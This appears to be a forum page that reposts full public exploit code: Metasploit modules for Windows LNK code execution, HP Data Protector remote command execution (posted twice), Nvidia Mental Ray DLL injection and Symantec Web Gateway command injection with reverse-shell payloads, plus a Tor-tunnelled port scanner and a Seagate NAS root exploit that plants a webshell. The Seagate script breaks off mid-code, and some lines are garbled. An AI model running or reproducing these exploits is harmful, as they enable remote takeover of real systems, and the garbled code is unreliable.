Search the Community

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE attr_accessor :dll_base_name attr_accessor :exploit_dll_base_name def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Windows Shell LNK Code Execution', 'Description' => %q{ This module exploits a vulnerability in the MS10-046 patch to abuse (again) the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates the required files to exploit the vulnerability. They must be uploaded to an UNC path accessible by the target. This module has been tested successfully on Windows 2003 SP2 with MS10-046 installed and Windows 2008 SP2 (32 bits) with MS14-027 installed. }, 'Author' => [ 'Michael Heerklotz', # Vulnerability discovery 'juan vazquez' # msf module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-0096'], ['MSB', 'MS15-020'], ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so'], ['URL', 'https://github.com/rapid7/metasploit-framework/pull/4911'] # How to guide here ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 2048, }, 'Platform' => 'win', 'Targets' => [ ['Automatic', { }] ], 'DisclosureDate' => 'Mar 10 2015', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [true, 'The LNK file', 'msf.lnk']), OptString.new('UNCHOST', [true, 'The host portion of the UNC path to provide to clients (ex: 1.2.3.4).']), OptString.new('UNCSHARE', [true, 'The share folder portion of the UNC path to provide to clients (ex: share).']), ], self.class) end def smb_host "\\\\#{datastore['UNCHOST']}\\#{datastore['UNCSHARE']}\\" end def exploit_dll_filename name_length = 257 - (smb_host.length + 4 + 2) self.dll_base_name = dll_base_name || rand_text_alpha(1) self.exploit_dll_base_name = exploit_dll_base_name || rand_text_alpha(name_length) "#{dll_base_name} #{exploit_dll_base_name}.dll" end def dll_filename self.dll_base_name = dll_base_name || rand_text_alpha(1) "#{dll_base_name}.dll" end def create_exploit_file(file_name, data) unless ::File.directory?(Msf::Config.local_directory) FileUtils.mkdir_p(Msf::Config.local_directory) end path = File.join(Msf::Config.local_directory, file_name) full_path = ::File.expand_path(path) File.open(full_path, 'wb') { |fd| fd.write(data) } full_path end def dll_create(data) full_path = create_exploit_file(dll_filename, data) print_good "DLL with payload stored at #{full_path}" end def exploit_dll_create(data) full_path = create_exploit_file(exploit_dll_filename, data) print_good "Fake dll to exploit stored at #{full_path}" end def exploit dll = generate_payload_dll dll_create(dll) exploit_dll_create(dll) lnk = generate_link("#{smb_host}#{exploit_dll_filename}") file_create(lnk) end # stolen from ms10_046_shortcut_icon_dllloader, all the credits to the original authors: 'hdm', 'jduck', 'B_H' def generate_link(unc) uni_unc = unc.unpack('C*').pack('v*') path = '' path << [ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ].pack('C*') path << uni_unc # LinkHeader ret = [ 0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ].pack('C*') idlist_data = '' idlist_data << [0x12 + 2].pack('v') idlist_data << [ 0x1f, 0x00, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30, 0x30, 0x9d ].pack('C*') idlist_data << [0x12 + 2].pack('v') idlist_data << [ 0x2e, 0x1e, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, 0x30, 0x9d ].pack('C*') idlist_data << [path.length + 2].pack('v') idlist_data << path idlist_data << [0x00].pack('v') # TERMINAL WOO # LinkTargetIDList ret << [idlist_data.length].pack('v') # IDListSize ret << idlist_data # ExtraData blocks (none) ret << [rand(4)].pack('V') # Patch in the LinkFlags ret[0x14, 4] = ['10000001000000000000000000000000'.to_i(2)].pack('N') ret end end Source

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::SMB::Server::Share attr_accessor :exploit_dll_name def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Windows Shell LNK Code Execution', 'Description' => %q{ This module exploits a vulnerability in the MS10-046 patch to abuse (again) the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This creates an SMB resource to provide the payload and the trigger, and generates a LNK file which must be sent to the target. This module has been tested successfully on Windows 2003 SP2 with MS10-046 installed and Windows 2008 SP2 (32 bits) with MS14-027 installed. }, 'Author' => [ 'Michael Heerklotz', # Vulnerability discovery 'juan vazquez' # msf module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-0096'], ['MSB', 'MS15-020'], ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so'], ['URL', 'https://github.com/rapid7/metasploit-framework/pull/4911'] # How to guide here ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 2048, }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { } ] ], 'DisclosureDate' => 'Mar 10 2015', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [true, 'The LNK file', 'msf.lnk']) ], self.class) register_advanced_options( [ OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', false]) ], self.class) deregister_options('FILE_CONTENTS', 'FILE_NAME') end def smb_host "\\\\#{srvhost}\\#{share}\\" end def setup super self.file_contents = generate_payload_dll random_char = rand_text_alpha(1) self.file_name = "#{random_char}.dll" prefix = "#{random_char} " random_length = 257 - smb_host.length - file_name.length - prefix.length self.exploit_dll_name = "#{prefix}#{rand_text_alpha(random_length)}#{file_name}" print_status("Payload available on #{unc}...") print_status("Trigger available on #{smb_host}#{exploit_dll_name}...") end def primer lnk = generate_link("#{smb_host}#{exploit_dll_name}") file_create(lnk) print_status('The LNK file must be sent or shared with the target...') end def generate_link(unc) uni_unc = unc.unpack('C*').pack('v*') path = '' path << [ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ].pack('C*') path << uni_unc # LinkHeader ret = [ 0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ].pack('C*') idlist_data = '' idlist_data << [0x12 + 2].pack('v') idlist_data << [ 0x1f, 0x00, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30, 0x30, 0x9d ].pack('C*') idlist_data << [0x12 + 2].pack('v') idlist_data << [ 0x2e, 0x1e, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, 0x30, 0x9d ].pack('C*') idlist_data << [path.length + 2].pack('v') idlist_data << path idlist_data << [0x00].pack('v') # TERMINAL WOO # LinkTargetIDList ret << [idlist_data.length].pack('v') # IDListSize ret << idlist_data # ExtraData blocks (none) ret << [rand(4)].pack('V') # Patch in the LinkFlags ret[0x14, 4] = ['10000001000000000000000000000000'.to_i(2)].pack('N') ret end end Source

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::SMB::Server::Share include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => 'HP Data Protector 8.10 Remote Command Execution', 'Description' => %q{ This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary commands can be execute by sending crafted requests with opcode 28 to the OmniInet service listening on the TCP/5555 port. Since there is an strict length limitation on the command, rundll32.exe is executed, and the payload is provided through a DLL by a fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on Windows 7 SP1. }, 'Author' => [ 'Christian Ramirez', # POC 'Henoch Barrera', # POC 'Matthew Hall <hallm[at]sec-1.com>' # Metasploit Module ], 'References' => [ ['CVE', '2014-2623'], ['OSVDB', '109069'], ['EDB', '34066'], ['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818'] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'Privileged' => true, 'Platform' => 'win', 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [ [ 'HP Data Protector 8.10 / Windows', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 02 2014')) register_options( [ Opt::RPORT(5555), OptString.new('FILE_NAME', [ false, 'DLL File name to share']), OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15]) ], self.class) deregister_options('FOLDER_NAME') deregister_options('FILE_CONTENTS') end def check fingerprint = get_fingerprint if fingerprint.nil? return Exploit::CheckCode::Unknown end print_status("#{peer} - HP Data Protector version #{fingerprint}") if fingerprint =~ /HP Data Protector A\.08\.(\d+)/ minor = $1.to_i else return Exploit::CheckCode::Safe end if minor < 11 return Exploit::CheckCode::Appears end Exploit::CheckCode::Detected end def peer "#{rhost}:#{rport}" end def get_fingerprint ommni = connect ommni.put(rand_text_alpha_upper(64)) resp = ommni.get_once(-1) disconnect if resp.nil? return nil end Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null end def send_pkt(cmd) cmd.gsub!("\\", "\\\\\\\\") pkt = "2\x00" pkt << "\x01\x01\x01\x01\x01\x01\x00" pkt << "\x01\x00" pkt << "\x01\x00" pkt << "\x01\x00" pkt << "\x01\x01\x00 " pkt << "28\x00" pkt << "\\perl.exe\x00 " pkt << "-esystem('#{cmd}')\x00" connect sock.put([pkt.length].pack('N') + pkt) disconnect end def primer self.file_contents = generate_payload_dll print_status("File available on #{unc}...") print_status("#{peer} - Trying to execute remote DLL...") sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}" send_pkt(sploit) end def setup super self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll" unless file_name =~ /\.dll$/ fail_with(Failure::BadConfig, "FILE_NAME must end with .dll") end end def exploit begin Timeout.timeout(datastore['SMB_DELAY']) {super} rescue Timeout::Error # do nothing... just finish exploit and stop smb server... end end end

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::SMB::Server::Share include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Nvidia Mental Ray Satellite Service Arbitrary DLL Injection', 'Description' => %q{ The Nvidia Mental Ray Satellite Service listens for control commands on port 7414. When it receives the command to load a DLL (via an UNC path) it will try to connect back to the host on port 7514. If a TCP connection is successful it will then attempt to load the DLL. This module has been tested successfully on Win7 x64 with Nvidia Mental Ray Satellite Service v3.11.1. }, 'License' => MSF_LICENSE, 'Author' => [ 'Luigi Auriemma', # Discovery 'Donato Ferrante', # Discovery 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module ], 'References' => [ [ 'URL', 'http://revuln.com/files/ReVuln_NVIDIA_mental_ray.pdf' ] ], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Platform' => 'win', 'Targets' => [ [ 'Windows x64', { 'Arch' => [ ARCH_X86_64 ] } ] ], 'Privileged' => true, 'DisclosureDate' => 'Dec 10 2013', 'DefaultTarget' => 0)) register_options([ Opt::RPORT(7414), OptInt.new('LISTEN_PORT', [ true, 'The port to catch the return connection on', 7514]), OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15]) ], self.class) deregister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE', 'FOLDER_NAME') end def primer self.file_contents = generate_payload_dll print_status("File available on #{unc}...") print_status("Trying to execute remote DLL...") send_exploit end def setup super # These lengths are required, although we specify the UNC path # length in the exploit, the header probably has another length # value we don't adjust. self.file_name = "#{Rex::Text.rand_text_alpha(7)}.dll" self.share = Rex::Text.rand_text_alpha(5) end def exploit begin Timeout.timeout(datastore['SMB_DELAY']) { super } rescue Timeout::Error # do nothing... just finish exploit and stop smb server... end end def send_exploit # No idea what most of this hello is... hello = "6c72696d3030303030203030303031203136333932203037353134203030303031203039303936203030303030207261796d7" hello << "36734302d332e31312e312e345f5f5f5f5f5f5f5f5f5f5f5f0020007c5241593331317c53554231000100000000e90300000" hello << "0000000ffffffffffffffff1807000000000000dc10d7fdfe0700003018a40500000000e73654fffe070000c0afcd0000000" hello << "000ffffffffffffffffffffffffffffffff18070000000000007014a70100000000763754fffe0700000000000000000000f" hello << "035ae01000000003036ae0100000000da2152fffe0700003036ae0100000000a33754fffe070000000000000000000000000" hello << "00000000000ffffffffffffffffffffffffffffffff3036ae0100000000c40e53fffe0700007014a70100000000180700000" hello << "0000000000000000000000000000000000000000000000000000000020000000000000001000000000000005035440400000" hello << "0008013a7010000000090b3cd00000000001807000000000000b929d80300000000000000000000000018070000000000009" hello << "0b3cd000000000010cda701000000000000000000000000010100000000000000b3cd0000000000060000000000000066000" hello << "200000000000000020000000a0008000000a01a0fe73d00cf118ca300804034ae01000000000100000000000000000000000" hello << "0000000030000000a000000" hello = Rex::Text.hex_to_raw(hello) # Start of command - again no idea what this is... load_dll = Rex::Text.hex_to_raw("4ed32cb1740500000000000001130013") # Length of path string including null byte load_dll << [unc.length + 1].pack('V') # Data type? load_dll << [2].pack('V') # Assembly Load? load_dll << "AL" load_dll << unc << "\x00" # Some padding at the end... load_dll << rand_text_alpha(1386 - unc.length) # We have to start a second listening port although we dont actually care about # handling client connections. It appears as long as the service can make a # connection its happy and will move onto the DLL loading create_listen_port vprint_status("Connecting to target and sending commands") connect sock.put(hello) sock.put(load_dll) print_status("Instructed the service to load #{unc}...") end def create_listen_port port = datastore['LISTEN_PORT'] comm = datastore['ListenerComm'] if comm == "local" comm = ::Rex::Socket::Comm::Local else comm = nil end @listener = Rex::Socket::TcpServer.create( 'LocalHost' => datastore['SRVHOST'], 'LocalPort' => port, 'Comm' => comm, 'Context' => { 'Msf' => framework, 'MsfExploit' => self } ) # Register callbacks @listener.on_client_connect_proc = proc { |cli| add_socket(cli) begin print_status("#{cli.peerhost.ljust(16)} #{shortname} - Connected to Listener on #{port}...") ensure # Need to close the socket for the SMB request to be # initiated... remove_socket(cli) end } @listener.start vprint_status("Started listening on TCP port #{port}") end def cleanup super return unless @listener begin @listener.deref if @listener.is_a?(Rex::Service) if @listener.is_a?(Rex::Socket) @listener.close @listener.stop end @listener = nil rescue ::Exception end end end Source

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::SMB::Server::Share include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => 'HP Data Protector 8.10 Remote Command Execution', 'Description' => %q{ This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary commands can be execute by sending crafted requests with opcode 28 to the OmniInet service listening on the TCP/5555 port. Since there is an strict length limitation on the command, rundll32.exe is executed, and the payload is provided through a DLL by a fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on Windows 7 SP1. }, 'Author' => [ 'Christian Ramirez', # POC 'Henoch Barrera', # POC 'Matthew Hall <hallm[at]sec-1.com>' # Metasploit Module ], 'References' => [ ['CVE', '2014-2623'], ['OSVDB', '109069'], ['EDB', '34066'], ['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818'] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'Privileged' => true, 'Platform' => 'win', 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [ [ 'HP Data Protector 8.10 / Windows', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 02 2014')) register_options( [ Opt::RPORT(5555), OptString.new('FILE_NAME', [ false, 'DLL File name to share']), OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15]) ], self.class) deregister_options('FILE_CONTENTS') end def check fingerprint = get_fingerprint if fingerprint.nil? return Exploit::CheckCode::Unknown end print_status("#{peer} - HP Data Protector version #{fingerprint}") if fingerprint =~ /HP Data Protector A\.08\.(\d+)/ minor = $1.to_i else return Exploit::CheckCode::Safe end if minor < 11 return Exploit::CheckCode::Appears end Exploit::CheckCode::Detected end def peer "#{rhost}:#{rport}" end def get_fingerprint ommni = connect ommni.put(rand_text_alpha_upper(64)) resp = ommni.get_once(-1) disconnect if resp.nil? return nil end Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null end def send_pkt(cmd) cmd.gsub!("\\", "\\\\\\\\") pkt = "2\x00" pkt << "\x01\x01\x01\x01\x01\x01\x00" pkt << "\x01\x00" pkt << "\x01\x00" pkt << "\x01\x00" pkt << "\x01\x01\x00 " pkt << "28\x00" pkt << "\\perl.exe\x00 " pkt << "-esystem('#{cmd}')\x00" connect sock.put([pkt.length].pack('N') + pkt) disconnect end def primer self.file_contents = generate_payload_dll print_status("File available on #{unc}...") print_status("#{peer} - Trying to execute remote DLL...") sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}" send_pkt(sploit) end def setup super self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll" unless file_name =~ /\.dll$/ fail_with(Failure::BadConfig, "FILE_NAME must end with .dll") end end def exploit begin Timeout.timeout(datastore['SMB_DELAY']) {super} rescue Timeout::Error # do nothing... just finish exploit and stop smb server... end end end Source

This Metasploit module exploits a command injection vulnerability found in Symantec Web Gateway's setting restoration feature. The filename portion can be used to inject system commands into a syscall function, and gain control under the context of HTTP service. For Symantec Web Gateway 5.1.1, you can exploit this vulnerability by any kind of user. However, for version 5.2.1, you must be an administrator. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Symantec Web Gateway 5 restore.php Post Authentication Command Injection", 'Description' => %q{ This module exploits a command injection vulnerability found in Symantec Web Gateway's setting restoration feature. The filename portion can be used to inject system commands into a syscall function, and gain control under the context of HTTP service. For Symantec Web Gateway 5.1.1, you can exploit this vulnerability by any kind of user. However, for version 5.2.1, you must be an administrator. }, 'License' => MSF_LICENSE, 'Author' => [ 'Egidio Romano', # Original discovery & assist of MSF module 'sinn3r' ], 'References' => [ [ 'CVE', '2014-7285' ], [ 'OSVDB', '116009' ], [ 'BID', '71620' ], [ 'URL', 'http://karmainsecurity.com/KIS-2014-19' ], [ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20141216_00'] ], 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic python' } }, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'SSLVersion' => 'TLS1' }, 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Targets' => [ ['Symantec Web Gateway 5', {}] ], 'Privileged' => false, 'DisclosureDate' => "Dec 16 2014", # Symantec security bulletin (Vendor notified on 8/10/2014) 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The URI to Symantec Web Gateway', '/']), OptString.new('USERNAME', [true, 'The username to login as']), OptString.new('PASSWORD', [true, 'The password for the username']) ], self.class) end def protocol ssl ? 'https' : 'http' end def check uri = target_uri.path res = send_request_cgi({'uri' => normalize_uri(uri, 'spywall/login.php')}) if res && res.body.include?('Symantec Web Gateway') return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def get_sid sid = '' uri = target_uri.path res = send_request_cgi({ 'uri' => normalize_uri(uri, 'spywall/login.php'), 'method' => 'GET', }) unless res fail_with(Failure::Unknown, 'Connection timed out while retrieving PHPSESSID') end cookies = res.get_cookies sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || '' sid end def login(sid) uri = target_uri.path res = send_request_cgi({ 'uri' => normalize_uri(uri, 'spywall/login.php'), 'method' => 'POST', 'cookie' => sid, 'headers' => { 'Referer' => "#{protocol}://#{peer}/#{normalize_uri(uri, 'spywall/login.php')}" }, 'vars_post' => { 'USERNAME' => datastore['USERNAME'], 'PASSWORD' => datastore['PASSWORD'], 'loginBtn' => 'Login' } }) unless res fail_with(Failure::Unknown, 'Connection timed out while attempting to login') end cookies = res.get_cookies sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || '' if res.headers['Location'] =~ /executive_summary\.php$/ && !sid.blank? # Successful login return sid else # Failed login fail_with(Failure::NoAccess, "Bad username or password: #{datastore['USERNAME']}:#{datastore['PASSWORD']}") end end def build_payload # At of today (Feb 27 2015), there are only three payloads this module will support: # * cmd/unix/generic # * cmd/unix/reverse_python # * cmd/unix/reverse_python_ssl p = payload.encoded case datastore['PAYLOAD'] when /cmd\/unix\/generic/ # Filter that one out, Mr. basename() p = Rex::Text.encode_base64("import os ; os.system('#{Rex::Text.encode_base64(p)}'.decode('base64'))") p = "python -c \"exec('#{p}'.decode('base64'))\"" else p = p.gsub(/python -c "exec/, 'python -c \\"exec') p = p.gsub(/decode\('base64'\)\)"/, "decode('base64'))\\\"") end p end def build_mime p = build_payload data = Rex::MIME::Message.new data.add_part("#{Time.now.to_i}", nil, nil, 'form-data; name="posttime"') data.add_part('maintenance', nil, nil, 'form-data; name="configuration"') data.add_part('', 'application/octet-stream', nil, 'form-data; name="licenseFile"; filename=""') data.add_part('24', nil, nil, 'form-data; name="raCloseInterval"') data.add_part('', nil, nil, 'form-data; name="restore"') data.add_part("#{Rex::Text.rand_text_alpha(4)}\n", 'text/plain', nil, "form-data; name=\"restore_file\"; filename=\"#{Rex::Text.rand_text_alpha(4)}.txt; #{p}\"") data.add_part('Restore', nil, nil, 'form-data; name="restoreFile"') data.add_part('0', nil, nil, 'form-data; name="event_horizon"') data.add_part('0', nil, nil, 'form-data; name="max_events"') data.add_part(Time.now.strftime("%m/%d/%Y"), nil, nil, 'form-data; name="cleanlogbefore"') data.add_part('', nil, nil, 'form-data; name="testaddress"') data.add_part('', nil, nil, 'form-data; name="pingaddress"') data.add_part('and', nil, nil, 'form-data; name="capture_filter_op"') data.add_part('', nil, nil, 'form-data; name="capture_filter"') data end def inject_exec(sid) uri = target_uri.path mime = build_mime # Payload inside send_request_cgi({ 'uri' => normalize_uri(uri, 'spywall/restore.php'), 'method' => 'POST', 'cookie' => sid, 'data' => mime.to_s, 'ctype' => "multipart/form-data; boundary=#{mime.bound}", 'headers' => { 'Referer' => "#{protocol}://#{peer}#{normalize_uri(uri, 'spywall/mtceConfig.php')}" } }) end def save_cred(username, password) service_data = { address: rhost, port: rport, service_name: protocol, protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { module_fullname: self.fullname, origin_type: :service, username: username, private_data: password, private_type: :password }.merge(service_data) credential_core = create_credential(credential_data) login_data = { core: credential_core, last_attempted_at: DateTime.now, status: Metasploit::Model::Login::Status::SUCCESSFUL }.merge(service_data) create_credential_login(login_data) end def exploit print_status("Getting the PHPSESSID...") sid = get_sid if sid.blank? print_error("Failed to get the session ID. Cannot continue with the login.") return end print_status("Attempting to log in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}") sid = login(sid) if sid.blank? print_error("Failed to get the session ID from the login process. Cannot continue with the injection.") return else # Good password, keep it save_cred(datastore['USERNAME'], datastore['PASSWORD']) end print_status("Trying restore.php...") inject_exec(sid) end end Source

# tmap 0.1 # Coded by TheKingOf9x <AT> yandex . com # Fast multi-threaded port scanner which tunnels through TOR. # Depends on the PySocks library: https://github.com/Anorov/PySocks # And of course TOR: apt-get install tor # # Do not use hostnames, may leak DNS info. only use IP addresses. # # Not happy with the Privoxy + TOR (exit relay only) + nmap config. I made this. # # Usage: # python tmap.py import sys import socks import datetime import threading lock = threading.Semaphore(value = 1) #Port of TOR server TOR_PORT = 9050 #timeout. Experiment with this. TIMEOUT = 20 #Port list to scan, ammend at will ports = (21,22,23,80,443,1433,3306,8080) def main(): if len(sys.argv) < 3: print("\033[92m\n\t\t\ttmap 0.1\n\nFast multi-threaded port scanner which tunnels through TOR.\n\n\033[0m") print("Single host scan:\npython " + sys.argv[0] + " -s 192.168.0.1\n") print("/24 (Class C) range scan:\npython " + sys.argv[0] + " -r 192.168.0\n") print("List scan:\npython " + sys.argv[0] + " -l IPlist.txt\n") exit(0) scan_type = sys.argv[1] parameter = sys.argv[2] filename = datetime.datetime.now().strftime("%H:%M_%d-%m-%y.tmap") try: log = open(filename, "a") except: pass if scan_type == "-s": host_scan(parameter, log) elif scan_type == "-r": range_scan(parameter, log) elif scan_type == "-l": list_scan(parameter, log) else: exit(1) #main connect function def connect(ip, port, log): try: s = socks.socksocket() s.setproxy(socks.PROXY_TYPE_SOCKS5, 'localhost', TOR_PORT) s.settimeout(TIMEOUT) s.connect((ip, port)) output = ip + ":" + str(port) lock.acquire() # Lock/unlock to clean up screen output. print(output) try: log.write(output + "\n") except: pass except: pass finally: lock.release() def host_scan(ip, log): ip = ip.strip() for port in ports: try: t = threading.Thread(target=connect, args=(ip, port, log)) t.start() except: pass def range_scan(ip, log): ip = ip.strip() for i in range(1, 255): ip_addr = ip + "." + str(i) for port in ports: try: t = threading.Thread(target=connect, args=(ip_addr, port, log)) t.start() except: pass def list_scan(parameter, log): try: f = open(parameter, 'r') except: print("Could not open file: " + parameter) exit(1) for ip in f: ip = ip.strip() for port in ports: try: t = threading.Thread(target=connect, args=(ip, port, log)) t.start() except: pass if __name__ == '__main__': main() Download Source

#!/usr/bin/env python # # Seagape # ======= # Seagate Business NAS pre-authentication remote code execution # exploit as root user. # # by OJ Reeves (@TheColonial) - for full details please see # https://beyondbinary.io/advisory/seagate-nas-rce/ # # Usage # ===== # seagape.py <ip> <port> [-c [ua]] # # - ip : ip or host name of the target NAS # - port : port of the admin web ui # - -c : (optional) create a cookie which will give admin access. # Not specifying this flag results in webshell installation. # - ua : (optional) the user agent used by the browser for the # admin session (UA must match the target browser). # Default value is listed below # # Example # ======= # Install and interact with the web shell: # seagape.py 192.168.0.1 80 # # Create admin cookie # seagape.py 192.168.0.1 80 -c import base64 import hashlib import itertools import os import re import socket import sys import urllib import urllib2 import uuid import xml.sax.saxutils if len(sys.argv) < 3: print "Usage: {0} <ip> <port> [-c [user agent]]".format(sys.argv[0]) sys.exit(1) # Every Seagate nas has the same XOR key. Great. XOR_KEY = '0f0a000d02011f0248000d290d0b0b0e03010e07' # This is the User agent we'll use for most of the requests DEFAULT_UA = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' # This is the description we're going to be reading from LFI_FILE = '/etc/devicedesc' # the base globals that will hold our state host = sys.argv[1] port = int(sys.argv[2]) cis = '' hostname = '' webshell = str(uuid.uuid1()) + ".php" def chunks(s, n): for i in xrange(0, len(s), n): yield s[i:i + n] def forward_interleave(a, : return ''.join(itertools.chain(*zip(itertools.cycle(a), )) def xor(s, k): return ''.join(chr(ord(a) ^ ord() for a, b in itertools.izip(s, itertools.cycle(k))) def sha1(s): return hashlib.sha1(s).hexdigest() def decode(s): f = xor(s, XOR_KEY) return ''.join(chr(ord(a) ^ ord() for a, b in chunks(f, 2)) def encode(s): s = forward_interleave(sha1(s), s) s = ''.join(a + chr(ord(a) ^ ord() for a, b in chunks(s, 2)) return xor(s, XOR_KEY) def make_request(uri = "/", ci_session = None, headers = None, 